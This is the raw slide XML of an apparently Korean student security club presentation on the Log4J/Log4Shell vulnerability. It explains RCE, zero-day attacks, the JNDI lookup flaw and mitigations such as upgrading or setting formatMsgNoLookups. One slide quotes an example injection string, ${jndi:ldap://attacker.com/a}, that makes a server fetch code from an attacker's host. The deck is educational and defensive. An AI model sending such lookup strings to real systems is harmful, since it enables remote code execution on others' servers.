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5" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="26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4B39"/>
    <a:srgbClr val="00AE8E"/>
    <a:srgbClr val="D4F0B2"/>
    <a:srgbClr val="E5E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22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738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7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0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8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0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6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1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0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5E3DB-657C-4460-8F83-A5D76AFA1A2F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561FF-B85F-4317-874D-426696AB4E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79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hyperlink" Target="https://youtu.be/kwS3twdVsko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151" y="1546786"/>
            <a:ext cx="12192000" cy="211220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 Log4J</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="8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48000" y="396779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유한대학교</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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컴퓨터소프트웨어공학과</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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레퍼런스동아리 보안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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팀</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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4732" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3650165" y="1860928"/>
            <a:ext cx="1572321" cy="1483922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2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42"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="31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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="1032255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흐름도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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5928"/>
            <a:ext cx="10058400" cy="4566335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13"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="28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Log4J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>는 자바 기반의 소프트웨어에서 굉장히 광범위하게 쓰이는 라이브러리임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공격 방법이 너무 쉬움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문자열 날리기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공격 성공</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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내 소프트웨어가 이미 공격 당했는지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Log4J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 사용하기 시작한 시점부터 분석해야 함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>. 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>년간 사용 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>-&gt; 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>년치의 로그 분석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국정원 긴급 점검결과 현재 국가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공공기관 대상 피해는 발견 안됨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사상 최악의 취약점</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5825745"/>
            <a:ext cx="2529269" cy="1032255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9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13"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="40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JDNI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>취약점이 해결된 버전으로 업그레이드한다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자바 어플리케이션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옵션으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>JAVA_OPTS =-Dlog4j2.formatMsgNoLookups=true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 넘겨서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 못하게 하는 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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해결 방법</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="1032255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1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43"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="24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662854" y="742781"/>
            <a:ext cx="4543098" cy="4831697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38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70173" y="1676064"/>
            <a:ext cx="6728460" cy="296513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8800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8800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67821" y="6057807"/>
            <a:ext cx="4975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출처 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1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ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId5" tooltip="https://youtu.be/kwS3twdVsko"/>
              </a:rPr>
              <a:t>https://youtu.be/kwS3twdVsko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67821" y="5632755"/>
            <a:ext cx="778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출처 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1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ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>https://www.youtube.com/watch?v=qaeLkwhHZTo&amp;t=12s</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"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6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2"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="8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RCE(Remote Code Execution)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400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32292"/>
            <a:ext cx="10515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2700" dirty="0" smtClean="0"/>
              <a:t>조작된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>웹페이지나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> 이미지 파일을 보는 것만으로도 외부에서 전송된 코드가 실행되는 취약점을 의미함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="27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700" dirty="0" smtClean="0"/>
              <a:t>원격지에서 임의의 공격 명령 실행이 가능한 취약점</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>해커가 원격으로 자신의 서버에서 마음대로 코드를 돌릴 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="27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700" dirty="0" smtClean="0"/>
              <a:t>Db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>데이터를 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>삭제하거나 모든 정보 암호화 후 금전 요구 등</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2700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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="103225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5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87"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="35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로컬 취약점 공격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취약점 공격이 공격 대상 자체에서 실행됨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원격 취약점 공격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공격자의 컴퓨터에서 실행되어 다른 컴퓨터를 공격 대상으로 함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RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 경우 원격 취약점 공격 방식임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RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" dirty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5400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발생 이전의 공격 방식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="1032255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7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01"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="27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제로데이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="5400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공격</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400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4815"/>
            <a:ext cx="10515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2700" dirty="0" smtClean="0"/>
              <a:t>소프트웨어의 취약점을 공격하는 기술적 위협</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>해당 취약점에 대한 패치가 나오지 않은 시점에서 이루어짐</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>해당 취약점이 이미 노출되어 해킹에 사용되어 있어 고칠 시간이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>임을 뜻함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="103225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16"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="21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Log4J</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400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03426"/>
            <a:ext cx="10355317" cy="4351338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3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>쉽게 말해 자바로 만들어진 앱에서 로그를 기록해주는 프로그램</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3200" spc="-15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3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>이벤트 로그의 경우 시스템 실행 시 발생하는 이벤트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>마우스 클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>를 기록하며 시스템 활동을 이해하고 문제를 진단하는 데 사용됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" spc="-15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spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>이클립스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>안드로이드 스튜디오 등에 추가해서 프로그램 실행 시 자동으로 지정한 경로에 로그를 저장해주는 기능을 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" spc="-15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spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>프로그램에서 사용자가 입력한 정보를 신뢰하여 자신의 서버 내에서 사용자가 입력한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" spc="-150" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>을 실행시켜 버리는 취약점이 발생하였다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" spc="-150" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3200" spc="-15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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="103225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1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03"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="41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Log4Shell</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400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21802"/>
            <a:ext cx="10515600" cy="4351338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700" dirty="0"/>
              <a:t>log4j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>프로그램에서 발견된 취약점의 명칭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>제로데이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>RCE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>취약점에 해당됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="27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700" dirty="0" smtClean="0"/>
              <a:t>시스템의 결함을 오직 해커만 알고 있는 경우</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="27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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="103225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6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89"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="12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Log4Shell</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400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06245"/>
            <a:ext cx="10515600" cy="4351338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700" dirty="0" err="1" smtClean="0"/>
              <a:t>알리바바</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>보안팀에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> 의해 처음 발견됨</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>2021</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>년 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>월 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>일에 발견되었으나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>월</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>일부터 사용되고 있었음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>자바가 쓰이는 곳에서 매우 자주 쓰이는 패키지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>로그의 프레임 워크</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>로그를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>포멧팅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>필터링하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>어플리케이션 파일로 기록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="27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700" dirty="0" smtClean="0"/>
              <a:t>로그파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>서버에 일어나는 모든 일을 저장한 수백 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>수천개의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> 기록</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>인터넷에 연결된 모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>APK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>는 로그 기록을 사용하며 자바를 쓰는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>APK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>Log4J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>를 사용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="27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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="103225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1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72"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="38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Log4Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0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공격이 이루어지는 과정</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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21802"/>
            <a:ext cx="10515600" cy="4351338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신뢰할 수 없는 사용자 입력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유저가 입력하는 데이터들은 절대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>백엔드에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 실행하지 않음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.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신뢰한다면 누구든 서버에서 코드를 실행 가능함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E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>에 존재하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lookups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>라는 기능은 어느정도 유저의 입력을 신뢰함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공격자가 서버에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://attacker.com/a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E94B39"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>가 포함된 문자열로 요청을 보내면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, Log4J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>는 이걸 로그에 넣고 해당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>을 불러온다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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="1032255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4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53"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="49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2725" t="28906" r="28500" b="42960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9548431" y="5667502"/>
            <a:ext cx="2529269" cy="103225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>
                <a:solidFill>
                  <a:srgbClr val="E94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jndi:ldap</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E94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706245"/>
            <a:ext cx="10515600" cy="4351338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700" dirty="0" err="1" smtClean="0"/>
              <a:t>Jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>디렉터리 서비스에서 제공하는 데이터 및 객체를 발견하고 참고하기 위한 자바 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>API. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>자바 애플리케이션을 외부 디렉터리 서비스에 연결하는 용도로 사용함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>공격자가 이 경로를 자신의 서버로 지정하면 취약점이 있는 서버가 공격자의 서버에서 다운받게 됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="27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700" dirty="0" err="1" smtClean="0"/>
              <a:t>Idap</a:t>
            </a:r>
            <a:r>
